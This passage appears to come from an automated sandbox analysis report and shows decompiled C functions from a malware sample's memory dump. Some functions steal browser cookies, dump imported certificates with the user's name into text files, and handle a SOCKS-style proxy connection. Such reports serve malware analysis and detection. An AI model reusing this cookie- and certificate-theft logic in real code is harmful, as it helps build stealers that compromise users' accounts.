        • Instruction Fuzzy Hash: 03216071904228AFCB11DBE4CCC8EEF7BB8EF09751F1045A5F906EB251C6799940CBA5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00416EDE(signed int __edx, void** __esi, void* _a4, signed int _a8) {
        				char _v5;
        				long _v12;
        				void _v20;
        				signed int _v24;
        				signed int _v28;
        				signed int _v32;
        				signed int _v36;
        				signed int _t26;
        				signed int _t29;
        				signed int _t46;
        				void** _t48;
        
        				_t48 = __esi;
        				_t46 = __edx;
        				_v5 = 0;
        				if(_a8 <= 0xa00000) {
        					_t26 = E004161C4( *__esi);
        					_v36 = _t26;
        					_v32 = _t46;
        					if((_t26 & _t46) != 0xffffffff && E004161A4( *__esi, 0, 0, 2) != 0) {
        						_t29 = E004161C4( *__esi);
        						_v28 = _t29;
        						_v24 = _t46;
        						if((_t29 & _t46) != 0xffffffff) {
        							E004111B9( &_v20,  &_v20, 0, 5);
        							_v20 = __esi[4] ^ _a8;
        							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
        								E004161A4( *_t48, _v28, _v24, 0);
        								SetEndOfFile( *_t48);
        							} else {
        								_v5 = 1;
        							}
        						}
        						FlushFileBuffers( *_t48);
        						E004161A4( *_t48, _v36, _v32, 0);
        					}
        				}
        				return _v5;
        			}


        APIs
          • Part of subcall function 004161C4: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 004161D9
          • Part of subcall function 004161A4: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00416EB7,?,00000000,00000000,00000000,00000000), ref: 004161B6
        • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00416F5F
        • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00416F78
        • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00416F9C
        • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00416FA4
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$PointerWrite$BuffersFlush
        • String ID:
        • API String ID: 1289656144-0
        • Opcode ID: dceb885583c91cd30d93c1c8fc8047a2703741ae88f200bb0973aa399b757d27
        • Instruction ID: 99cde695af1c548967e921fc7cf38363eeec1c85da79b79abb8d2eb26cd208b3
        • Opcode Fuzzy Hash: dceb885583c91cd30d93c1c8fc8047a2703741ae88f200bb0973aa399b757d27
        • Instruction Fuzzy Hash: AC31BD76840108FFDF119FA5CC41EEEBBB9BF04344F15852AF550A21A1D33AC996DB18
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00405C3C(void* __eflags) {
        				void* _t1;
        				void* _t2;
        				void* _t3;
        				long _t6;
        				void* _t11;
        
        				_t1 = E004069FD(_t11, __eflags, 0x5ef893a3, 1);
        				_t19 = _t1;
        				if(_t1 != 0) {
        					_t2 = E00406B23();
        					__eflags = _t2;
        					if(_t2 != 0) {
        						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
        						_t6 = WaitForSingleObject( *0x41ea9c, 0x1388);
        						while(1) {
        							__eflags = _t6 - 0x102;
        							if(_t6 != 0x102) {
        								goto L6;
        							}
        							E0040CC7E();
        							_t6 = WaitForSingleObject( *0x41ea9c, 0x1388);
        						}
        					}
        					L6:
        					E004147B3(_t19);
        					_t3 = 0;
        					__eflags = 0;
        				} else {
        					_t3 = _t1 + 1;
        				}
        				return _t3;
        			}


        APIs
          • Part of subcall function 004069FD: CreateMutexW.KERNEL32(0041E5C8,00000000,?,?,?,?,?), ref: 00406A1E
        • GetCurrentThread.KERNEL32 ref: 00405C66
        • SetThreadPriority.KERNEL32(00000000), ref: 00405C6D
        • WaitForSingleObject.KERNEL32(00001388), ref: 00405C85
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
        • String ID:
        • API String ID: 3441234504-0
        • Opcode ID: e581bfc893bbea653cb0bdb389db8dd5afc743dde6bdd4bd8a2fdd60885bed0e
        • Instruction ID: e04d416062058ce45cc1921cc90ec39bfe2af313d57370e50c660eb4f899b832
        • Opcode Fuzzy Hash: e581bfc893bbea653cb0bdb389db8dd5afc743dde6bdd4bd8a2fdd60885bed0e
        • Instruction Fuzzy Hash: 10F08B72108B0D2BE61037A6AD05DAB3B4DDB013A4B200377FD15F22E1DD3A4C0049AD
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041474D(HANDLE* _a4) {
        				struct tagMSG _v28;
        				long _t16;
        
        				while(1) {
        					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
        					if(_t16 != 1) {
        						break;
        					}
        					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
        						if(_v28.message != 0x12) {
        							TranslateMessage( &_v28);
        							DispatchMessageW( &_v28);
        							continue;
        						}
        						goto L5;
        					}
        				}
        				L5:
        				return _t16;
        			}


        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: MessageMultipleObjectsPeekWait
        • String ID:
        • API String ID: 3986374578-0
        • Opcode ID: 5554e2b6e0ea95f983c339fe6b4647c5660ae1ea271065a94402b3840ed51681
        • Instruction ID: 4d68858f5729d0c37e1defba2941157a47bf3c1af8941c74009f686def8d96ab
        • Opcode Fuzzy Hash: 5554e2b6e0ea95f983c339fe6b4647c5660ae1ea271065a94402b3840ed51681
        • Instruction Fuzzy Hash: 75F0FC321043196BD710AA99EC48DA7BB9CEBC63A4F050536F621E31B0D275D9448775
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E0041277B(void* __ebx, intOrPtr _a4) {
        				intOrPtr _v20;
        				void* _v32;
        				signed int _t6;
        				signed int _t7;
        				int _t8;
        				int _t15;
        				void* _t16;
        
        				_t15 = 0;
        				_t6 = CreateToolhelp32Snapshot(4, 0);
        				_t16 = _t6;
        				_t7 = _t6 | 0xffffffff;
        				if(_t16 != _t7) {
        					_t8 =  &_v32;
        					_push(_t8);
        					_push(_t16);
        					_v32 = 0x1c;
        					asm("in al, 0x1c");
        					 *_t8 =  *_t8 + _t8;
        					asm("adc eax, 0x40111c");
        					while(_t8 != 0) {
        						if(_v20 == _a4) {
        							_t15 = _t15 + 1;
        						}
        						_t8 = Thread32Next(_t16,  &_v32);
        					}
        					CloseHandle(_t16);
        					return _t15;
        				}
        				return _t7;
        			}


        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00412788
        • Thread32First.KERNEL32 ref: 004127A3
        • Thread32Next.KERNEL32 ref: 004127B9
        • CloseHandle.KERNEL32(00000000), ref: 004127C4
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
        • String ID:
        • API String ID: 3643885135-0
        • Opcode ID: 16776ee72a55afeac2c67f0c79ad5e0892a19a4122a74c0c9a775cf1a7e65ee0
        • Instruction ID: dcf0eea4b58340055041b579d647c291f78401ceed44068c480e0381407a800f
        • Opcode Fuzzy Hash: 16776ee72a55afeac2c67f0c79ad5e0892a19a4122a74c0c9a775cf1a7e65ee0
        • Instruction Fuzzy Hash: 32F0E9355000156BC710AB65DD48DEF7BBCEB85360B000132FA21E21D4D7748841C6F9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0040E6A7(void* __eflags, signed int _a4) {
        				char _v9;
        				char _v13;
        				char _v20;
        				signed int _v24;
        				signed int _v29;
        				short _v31;
        				signed char _v32;
        				intOrPtr _v36;
        				signed int _v48;
        				short _v50;
        				char _v52;
        				char _v312;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* _t59;
        				void* _t61;
        				short _t77;
        				void* _t79;
        				void* _t84;
        				char _t103;
        				char* _t105;
        				signed int _t115;
        				void* _t125;
        				intOrPtr _t126;
        				void* _t127;
        				char _t129;
        				void* _t131;
        				intOrPtr _t132;
        				void* _t133;
        
        				_t110 = _a4;
        				_t59 = E00414598(_t110);
        				_push(0);
        				_push( &_v32);
        				_t61 = 7;
        				_v24 = 0 | _t59 == 0x00000017;
        				if(E004140BD(_t61, _t110) != 0) {
        					while(E004140BD(1, _t110,  &_v9, 0) != 0) {
        						if(_v9 == 0) {
        							_t115 = _v29;
        							_t116 = _t115 << 0x10;
        							_v13 = 0x5a;
        							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
        								L20:
        								_v9 = 1;
        								if(_v13 != 0x5a) {
        									L44:
        									return E0040E631(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
        								}
        								E004111B9( &_v52,  &_v52, 0, 0x10);
        								_t77 = 2;
        								_v52 = _t77;
        								_t79 = (_v32 & 0x000000ff) - 1;
        								if(_t79 == 0) {
        									_v50 = _v31;
        									_v48 = _v29;
        									_t127 = E00414123( &_v52);
        									if(_t127 == 0xffffffff) {
        										L23:
        										_v13 = 0x5b;
        										goto L44;
        									}
        									E004143DB(_t116, _t127);
        									_t84 = E0040E631(_t110, _t127, 0x5a, _v24);
        									if(_t84 != 1) {
        										if(_t84 != 0xffffffff) {
        											_v9 = 0;
        										} else {
        											_v13 = 0x5b;
        										}
        									} else {
        										_push(_t127);
        										_t84 = E0041421E(_t110);
        									}
        									E004143C5(_t84, _t127);
        									if(_v9 != 1 || _v13 == 0x5a) {
        										L34:
        										return _v9;
        									} else {
        										goto L44;
        									}
        								}
        								if(_t79 == 1) {
        									_t129 = E00414164( &_v52, 1);
        									_v20 = _t129;
        									if(_t129 == 0xffffffff) {
        										goto L23;
        									}
        									_t125 = E0040E631(_t110, _t129, 0x5a, _v24);
        									if(_t125 != 1) {
        										L31:
        										E004143C5(_t89, _t129);
        										if(_t125 == 0xffffffff) {
        											goto L23;
        										}
        										if(_t125 != 1) {
        											_v9 = 0;
        										}
        										goto L34;
        									}
        									_t126 = E00414395( &_v20,  &_a4);
        									_v36 = _t126;
        									E004143C5(_t93, _v20);
        									if(_t126 != 0xffffffff) {
        										E004143DB(_t116, _t126);
        										_t110 = _a4;
        										_t125 = E0040E631(_a4, _t126, 0x5a, _v24 | 0x00000002);
        										if(_t125 == 1) {
        											_push(_v36);
        											_t89 = E0041421E(_t110);
        										}
        										_t129 = _v36;
        										goto L31;
        									}
        									_t110 = _a4;
        									_v13 = 0x5b;
        									goto L44;
        								}
        								goto L23;
        							}
        							_t131 = 0;
        							while(1) {
        								_t116 = _t110;
        								if(E004140BD(1, _t110,  &_v9, 0) == 0) {
        									goto L1;
        								}
        								_t103 = _v9;
        								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
        								if(_t103 == 0) {
        									_t105 =  &_v312;
        									_v20 = 0;
        									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
        									if(_t105 == 0) {
        										_t132 = _v20;
        										while(_t132 != 0) {
        											if( *((intOrPtr*)(_t132 + 4)) == 2) {
        												E00411142( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
        												L19:
        												__imp__freeaddrinfo(_v20);
        												if(_t132 == 0) {
        													goto L12;
        												}
        												goto L20;
        											}
        											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
        										}
        										goto L19;
        									}
        									L12:
        									_v13 = 0x5b;
        									goto L20;
        								}
        								_t131 = _t131 + 1;
        								if(_t131 <= 0xff) {
        									continue;
        								}
        								goto L1;
        							}
        							goto L1;
        						}
        					}
        				}
        				L1:
        				return 0;
        			}


        APIs
          • Part of subcall function 00414598: getsockname.WS2_32(?,?,?), ref: 004145B6
        • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040E776
        • freeaddrinfo.WS2_32(?,?,?,00000004), ref: 0040E7AF
          • Part of subcall function 004143DB: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004143F1
          • Part of subcall function 0040E631: getpeername.WS2_32(000000FF,?,?), ref: 0040E655
          • Part of subcall function 0041421E: select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 004142BE
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
        • String ID: Z
        • API String ID: 1849152701-1505515367
        • Opcode ID: 6c22615e3939a152a47002da19674d62f6593527b79a6cea2baab981aaea35a5
        • Instruction ID: d2954e1d3d7df35b8a513ff69a3d8cb79adfcd0cb388beb945f58fe671540fd3
        • Opcode Fuzzy Hash: 6c22615e3939a152a47002da19674d62f6593527b79a6cea2baab981aaea35a5
        • Instruction Fuzzy Hash: 99612932E00118AADF20A6B6CC41AEFBBB99F55314F044D7BF911B32C1C67C8956C76A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041208A(intOrPtr* __ecx) {
        				CHAR* _v5;
        				intOrPtr _v12;
        				char _v16;
        				char _v20;
        				signed int _v24;
        				intOrPtr _v28;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				char _v52;
        				CHAR* _t94;
        				void* _t98;
        				CHAR* _t103;
        				CHAR* _t106;
        				CHAR* _t119;
        				intOrPtr _t120;
        				intOrPtr _t126;
        				signed char _t132;
        				intOrPtr _t134;
        				intOrPtr _t136;
        				intOrPtr _t140;
        				CHAR* _t141;
        				CHAR* _t142;
        				intOrPtr _t143;
        				intOrPtr* _t144;
        
        				_t144 = __ecx;
        				if(( *(__ecx + 0x1c) & 0x00000010) == 0) {
        					_t94 = 0;
        					_t142 = 0;
        					 *((intOrPtr*)(__ecx + 0x14)) = 0;
        					_v20 = 0;
        					__eflags =  *(__ecx + 8);
        					if( *(__ecx + 8) == 0) {
        						L39:
        						__eflags =  *(_t144 + 0x1c) & 0x00000001;
        						 *(_t144 + 0x18) = _t142;
        						if(( *(_t144 + 0x1c) & 0x00000001) == 0) {
        							return 1;
        						}
        						__eflags = _t142 -  *(_t144 + 0x10);
        						return 0 | _t142 ==  *(_t144 + 0x10);
        					}
        					__eflags = 1;
        					_v16 = 1;
        					_v12 = 1;
        					do {
        						_t119 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(_t144 + 4))));
        						__eflags = _t119 -  *_t144;
        						if(_t119 !=  *_t144) {
        							__eflags = _t119 -  *((intOrPtr*)(_t144 + 1));
        							if(_t119 ==  *((intOrPtr*)(_t144 + 1))) {
        								_t120 =  *((intOrPtr*)(_t144 + 8));
        								_t126 =  *((intOrPtr*)(_t144 + 1));
        								_t140 =  *((intOrPtr*)(_t144 + 4));
        								while(1) {
        									_t94 = _t94 + 1;
        									__eflags = _t94 - _t120;
        									if(__eflags >= 0) {
        										break;
        									}
        									__eflags =  *((intOrPtr*)(_t140 + _t94)) - _t126;
        									if( *((intOrPtr*)(_t140 + _t94)) == _t126) {
        										continue;
        									}
        									__eflags = _t94 - _t120;
        									break;
        								}
        								if(__eflags != 0) {
        									_t98 = E00411142( &_v52, _t144, 0x20);
        									_v48 = _v48 + _t98;
        									_v44 = _v44 - _t98;
        									 *(_t144 + 0x18) = _t142;
        									while(1) {
        										__eflags = _t142 -  *(_t144 + 0x10);
        										if(_t142 >=  *(_t144 + 0x10)) {
        											break;
        										}
        										_v40 =  *((intOrPtr*)(_t144 + 0xc)) + _t142;
        										_v36 =  *(_t144 + 0x10) - _t142;
        										_t103 = E0041208A( &_v52);
        										 *(_t144 + 0x18) = _v28 + _t142;
        										__eflags = _t103;
        										if(_t103 != 0) {
        											L7:
        											return 1;
        										}
        										_t142 =  &(_t142[1]);
        										__eflags = _t142;
        									}
        									L13:
        									return 0;
        								}
        								_t106 =  *(_t144 + 0x10);
        								L6:
        								 *(_t144 + 0x18) = _t106;
        								goto L7;
        							}
        							__eflags = _t142 -  *(_t144 + 0x10);
        							if(_t142 ==  *(_t144 + 0x10)) {
        								L12:
        								 *(_t144 + 0x18) = _t142;
        								goto L13;
        							}
        							_t141 = _t142[ *((intOrPtr*)(_t144 + 0xc))];
        							_t132 =  *(_t144 + 0x1c);
        							_v5 = _t141;
        							__eflags = _t132 & 0x0000000c;
        							if((_t132 & 0x0000000c) == 0) {
        								L26:
        								__eflags = _t119 - _t141;
        								if(_t119 == _t141) {
        									goto L38;
        								}
        								__eflags =  *(_t144 + 0x1c) & 0x00000002;
        								if(( *(_t144 + 0x1c) & 0x00000002) == 0) {
        									goto L12;
        								}
        								__eflags = _t119 - 0xa;
        								if(_t119 != 0xa) {
        									L33:
        									__eflags = _t141 - 0xa;
        									if(_t141 != 0xa) {
        										goto L12;
        									}
        									__eflags = _t119 - 0xd;
        									if(_t119 != 0xd) {
        										goto L12;
        									}
        									__eflags = _v16 -  *((intOrPtr*)(_t144 + 8));
        									if(_v16 >=  *((intOrPtr*)(_t144 + 8))) {
        										goto L12;
        									}
        									_t134 =  *((intOrPtr*)(_t144 + 4));
        									__eflags =  *((intOrPtr*)(_t134 + _t94 + 1)) - _t141;
        									if( *((intOrPtr*)(_t134 + _t94 + 1)) != _t141) {
        										goto L12;
        									}
        									_t94 = _t94 + 1;
        									_t60 =  &_v16;
        									 *_t60 = _v16 + 1;
        									__eflags =  *_t60;
        									goto L38;
        								}
        								__eflags = _t141 - 0xd;
        								if(_t141 != 0xd) {
        									goto L33;
        								}
        								__eflags = _v12 -  *(_t144 + 0x10);
        								if(_v12 >=  *(_t144 + 0x10)) {
        									goto L12;
        								}
        								_t136 =  *((intOrPtr*)(_t144 + 0xc));
        								__eflags =  *((intOrPtr*)(_t136 +  &(_t142[1]))) - _t119;
        								if( *((intOrPtr*)(_t136 +  &(_t142[1]))) != _t119) {
        									goto L12;
        								}
        								_t142 =  &(_t142[1]);
        								_v12 = _v12 + 1;
        								goto L38;
        							}
        							__eflags = _t132 & 0x00000008;
        							if((_t132 & 0x00000008) == 0) {
        								_t119 = CharLowerA(_t119);
        								_v5 = CharLowerA(_v5);
        								_t43 =  &_v20; // 0x407b3d
        								_t94 =  *_t43;
        								L25:
        								_t141 = _v5;
        								goto L26;
        							}
        							__eflags = _t119 - 0x41 - 0x19;
        							if(_t119 - 0x41 <= 0x19) {
        								_t119 =  &(_t119[0x20]);
        								__eflags = _t119;
        							}
        							__eflags = _t141 - 0x41 - 0x19;
        							if(_t141 - 0x41 > 0x19) {
        								_v5 = _t141;
        								goto L25;
        							}
        							_t141 =  &(_t141[0x20]);
        							goto L26;
        						}
        						__eflags = _t142 -  *(_t144 + 0x10);
        						if(_t142 !=  *(_t144 + 0x10)) {
        							goto L38;
        						}
        						goto L12;
        						L38:
        						_t142 =  &(_t142[1]);
        						_v12 = _v12 + 1;
        						_t94 = _t94 + 1;
        						_v16 = _v16 + 1;
        						_v20 = _t94;
        						__eflags = _t94 -  *((intOrPtr*)(_t144 + 8));
        					} while (_t94 !=  *((intOrPtr*)(_t144 + 8)));
        					goto L39;
        				}
        				E00411142( &_v52, __ecx, 0x20);
        				_v24 = _v24 & 0xffffffef;
        				_t143 = 0;
        				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
        					L4:
        					 *((intOrPtr*)(_t144 + 0x14)) = 0;
        					 *(_t144 + 0x18) = 0;
        					goto L13;
        				} else {
        					goto L2;
        				}
        				while(1) {
        					L2:
        					_v40 =  *((intOrPtr*)(_t144 + 0xc)) + _t143;
        					_v36 =  *(_t144 + 0x10) - _t143;
        					if(E0041208A( &_v52) != 0) {
        						break;
        					}
        					_t143 = _t143 + 1;
        					if(_t143 <  *(_t144 + 0x10)) {
        						continue;
        					}
        					goto L4;
        				}
        				_t106 = _v28 + _t143;
        				__eflags = _t106;
        				 *((intOrPtr*)(_t144 + 0x14)) = _t143;
        				goto L6;
        			}






























        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CharLower
        • String ID: ={@
        • API String ID: 1615517891-1776635516
        • Opcode ID: fb06f56fe8d382e4fc9f089d1cdd6c5ca29bf9c98969a3b4cd7765ad7fe4d287
        • Instruction ID: a0b737034a120b8bfdc852ca50cb0bdd90db9e76b2df4097b5994f60000137bb
        • Opcode Fuzzy Hash: fb06f56fe8d382e4fc9f089d1cdd6c5ca29bf9c98969a3b4cd7765ad7fe4d287
        • Instruction Fuzzy Hash: DF618F30A04745AFCB31CF68CA916EABBB2AF15304F14495EC692D3642C3B8A9D5CB59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 52%
        			E0040845B(void* __ecx, void* __edx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
        				char _v12;
        				char _v16;
        				char _v32;
        				char _v52;
        				char _v136;
        				char _v656;
        				void* __edi;
        				void* __esi;
        				void* _t34;
        				void* _t36;
        				void* _t41;
        				void* _t52;
        				void* _t59;
        				char* _t61;
        				char* _t66;
        				void* _t72;
        				void* _t73;
        				void* _t75;
        				intOrPtr* _t78;
        
        				_t73 = __edx;
        				_t72 = __ecx;
        				if(_a4 == 0) {
        					_push(0);
        					L17:
        					E00411106();
        					__eflags = 0;
        					return 0;
        				}
        				_t34 = 0x16;
        				_v12 = 0;
        				E0040CA33(_t34,  &_v32);
        				_t77 =  &_v136;
        				_t36 = 0x15;
        				E0040CA33(_t36,  &_v136);
        				_t41 = E004150D3(0x80000002, _t72,  &_v656, _t77,  &_v32, 0x104);
        				if(_t41 != 0 && _t41 != 0xffffffff && (_v656 == 0x38 || _v656 == 0x39)) {
        					_v12 = 0x2000;
        				}
        				E00411106( &_v656);
        				E00411106( &_v136);
        				E00411106( &_v32);
        				_t78 = __imp__InternetGetCookieExW;
        				_push(0);
        				_push(_v12);
        				_push( &_v16);
        				_push(0);
        				_push(0);
        				_push(_a4);
        				_v16 = 0;
        				if( *_t78() == 0) {
        					L15:
        					_push(_a4);
        					goto L17;
        				} else {
        					_t50 = _v16;
        					if(_v16 <= 0) {
        						goto L15;
        					}
        					_t52 = E004110D6(_t50 + _t50 + 2);
        					_push(0);
        					_push(_v12);
        					_t75 = _t52;
        					_push( &_v16);
        					_push(_t75);
        					_push(0);
        					_push(_a4);
        					if( *_t78() != 0) {
        						_t59 = 8;
        						E0040CA33(_t59,  &_v52);
        						_t61 = _a8;
        						_t91 = _t61;
        						if(_t61 == 0) {
        							_t61 = "-";
        						}
        						_push(_t75);
        						_push(_t61);
        						E004111B9(E00410F70(_t72, _t73, _t91, 0xd, _a4, 0,  &_v52, _a12), 0x420048, 0, 0x104);
        						_t66 = E004110D6(0x338);
        						if(_t66 != 0) {
        							 *_t66 = 0;
        							 *((intOrPtr*)(_t66 + 0x32c)) = 0x420048;
        							 *((char*)(_t66 + 0x330)) = 0;
        							E0041504A(0x420048, 0, E004108E5, _t66);
        						}
        						E0041508F(0x420048, 0xa);
        						E004150B7(0x420048);
        					}
        					E00411106(_a4);
        					E00411106(_t75);
        					return 1;
        				}
        			}























        APIs
          • Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8
        • InternetGetCookieExW.WININET(?,00000000,00000000,?,?,00000000), ref: 00408505
        • InternetGetCookieExW.WININET(?,00000000,00000000,?,?,00000000), ref: 00408532
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CookieInternet$Open
        • String ID: 9
        • API String ID: 237861858-2366072709
        • Opcode ID: f3c2c8495630261d90ac5f172b2135dfb06dd0af71d1d3bbc4b071dbdb3cd83c
        • Instruction ID: e11632ff6d069cd30ea1fdf7572d247407de1a076a13a24f3a3cb66a3e9c5970
        • Opcode Fuzzy Hash: f3c2c8495630261d90ac5f172b2135dfb06dd0af71d1d3bbc4b071dbdb3cd83c
        • Instruction Fuzzy Hash: 19419471D00219BADF10ABA5CC85EEE7B7CAB04344F10447BB644F7191DB789A85CBA9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 60%
        			E00407781(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
        				char _v536;
        				char _v600;
        				char _v728;
        				char _v744;
        				struct _SYSTEMTIME _v760;
        				intOrPtr _v764;
        				intOrPtr _v772;
        				intOrPtr _v776;
        				char _v784;
        				void* __edi;
        				void* __esi;
        				void* _t47;
        				void* _t58;
        				intOrPtr* _t59;
        				void* _t61;
        				void* _t65;
        				intOrPtr* _t66;
        				void* _t67;
        				void* _t71;
        				char* _t74;
        				signed int _t76;
        				void* _t78;
        				void* _t79;
        
        				_t61 = __ecx;
        				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
        				_t59 = _a4;
        				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
        				_v776 = __eax;
        				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E00406B23() != 0) {
        					GetSystemTime( &_v760);
        					E0040CA33(0xaa,  &_v600);
        					_t74 =  &_v744;
        					E0040CA33(0xab, _t74);
        					E004075B0( &_v536, _t61);
        					_push(_v760.wYear & 0x0000ffff);
        					_push(_v760.wMonth & 0x0000ffff);
        					_push(_v760.wDay & 0x0000ffff);
        					_push(_t74);
        					_push( &_v536);
        					_push( &_v600);
        					_t65 = 0x3e;
        					_t47 = E00411DF9( &_v600, _t65,  &_v728);
        					_t79 = _t78 + 0x18;
        					if(_t47 > 0 && E00410E2E(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
        						_t66 = _a8;
        						if(_t66 != 0 &&  *_t66 != 0) {
        							 *((short*)(E00411142(_t79 + 0x48 + E00411C55( &_v728) * 2, L".txt", 8) + 8)) = 0;
        							_t64 = _t66;
        							if(E00411F5D(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
        								E00410E2E(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
        								E00411F4B( &_v784);
        							}
        						}
        					}
        				}
        				return _v776;
        			}



























        APIs
        • PFXImportCertStore.CRYPT32(?,?,?), ref: 0040779A
          • Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B
        • GetSystemTime.KERNEL32(?), ref: 004077E6
          • Part of subcall function 004075B0: GetUserNameExW.SECUR32(00000002,?,?), ref: 004075C5
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
        • String ID: .txt
        • API String ID: 1412380219-2195685702
        • Opcode ID: 105492e59ddcc8c5d41947ca3752e4bbce7497a51e5281ac0dc4d088c04b58c9
        • Instruction ID: 617042c2f6f740cedb6460626349e9e7d0e8b50c7c5dd30430e4d5c7ace60a11
        • Opcode Fuzzy Hash: 105492e59ddcc8c5d41947ca3752e4bbce7497a51e5281ac0dc4d088c04b58c9
        • Instruction Fuzzy Hash: 9A31B332604345ABDB20EF55CD45FAB77A8EF84304F00452ABA44A62D1D738E945C777
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CoCreateInstance.OLE32(00403180,00000000,00004401,00403190,?,?,00000000), ref: 00409879
        • CoCreateInstance.OLE32(00403150,00000000,00004401,00403160,?,?,00000000), ref: 004098CC
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CreateInstance
        • String ID: D
        • API String ID: 542301482-2746444292
        • Opcode ID: 2aeec06e679d536df223cf2f79cca6f86b34d9cb53889bfc670a7e268c055708
        • Instruction ID: e593250111069b92ae9cb7c70db1951e39ca8c7f6775df8587d49efb56acb42a
        • Opcode Fuzzy Hash: 2aeec06e679d536df223cf2f79cca6f86b34d9cb53889bfc670a7e268c055708
        • Instruction Fuzzy Hash: A8316FB2604305AFE710DF54CC85D6BB7ECAF88744F10452EF994A7291E734DD058BA5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00418C01(struct HINSTANCE__* __eax) {
        				char _v8;
        				char _v20;
        				char _v108;
        				void* __edi;
        				void* __esi;
